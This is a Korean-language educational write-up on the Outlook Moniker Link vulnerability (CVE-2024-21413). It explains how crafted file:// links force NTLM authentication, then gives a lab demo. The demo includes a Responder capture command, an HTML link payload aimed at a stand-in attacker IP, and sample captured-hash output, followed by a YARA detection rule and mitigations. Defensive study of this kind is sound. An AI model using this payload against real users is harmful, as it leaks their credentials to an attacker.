
CVE-2024-21413은 흔히 Moniker Link 취약점이라고 불리며, 사용자 상호작용 없이 공격자가 사용자 자격 증명을 유출할 수 있게 하는 Microsoft Outlook의 치명적인 보안 결함입니다.
전통적인 피싱 공격과 달리 이 취약점은 이메일을 미리 보는 것만으로 트리거될 수 있어 기업 환경에서 특히 위험합니다.
이 문제는 Outlook이 moniker 링크를 처리하는 방식에서 비롯되며, 공격자가 제어하는 시스템에 대한 의도하지 않은 인증 시도를 유발합니다.
다음 개념을 이해하는 것이 필수적입니다:
Windows 전용 메커니즘으로, 애플리케이션이 다음과 같은 프로토콜을 사용해 외부 리소스를 참조할 수 있게 합니다:
file://unc://\\attacker-server\share
네트워크를 통해 공유 리소스에 접근하는 데 사용됩니다. 이 취약점에서는 인증 요청을 강제하는 데 악용됩니다.
Outlook의 보호된 보기(Protected View) 는 잠재적으로 안전하지 않은 콘텐츠를 격리하도록 설계되었습니다. 이 취약점은 해당 보호를 우회하여 외부 리소스 접근을 허용합니다.
페이로드 제작
file://attacker-server/share)를 삽입합니다.전달
트리거
자동 처리
인증 요청
자격 증명 노출
[Attacker]
|
| 1. Send crafted email
v
[Victim Outlook]
|
| 2. Auto-process moniker link
v
[Windows System]
|
| 3. NTLM authentication attempt
v
[Attacker Server]
|
| 4. Capture NTLM hash
v
[Credential Abuse / Lateral Movement]
⚠️ 통제된 실험실 환경에서만 수행하세요
sudo responder -I eth0
<a href="file://attacker-ip/share">Open Document</a>
[SMB] NTLMv2 Hash captured
User: victim
Florian Roth가 moniker 링크를 이용한 공격 시도를 식별하기 위한 탐지 규칙을 개발했습니다.
rule Outlook_MonikerLink_CVE_2024_21413
{
meta:
description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
author = "Florian Roth"
reference = "CVE-2024-21413"
strings:
$a = "file://"
$b = "\\\\"
condition:
any of them
}
file:// 및 UNC 기반 링크 필터링 또는 삭제CVE-2024-21413은 자동 인증과 같은 시스템 동작이 이메일 링크처럼 겉보기에 무해한 입력을 통해 어떻게 악용될 수 있는지 보여줍니다.
💡 권장사항: 가상 실습 환경(예: Windows VM + 공격자 VM)에서 이 취약점을 재현하여 공격 체인과 방어 전략을 완전히 이해하세요.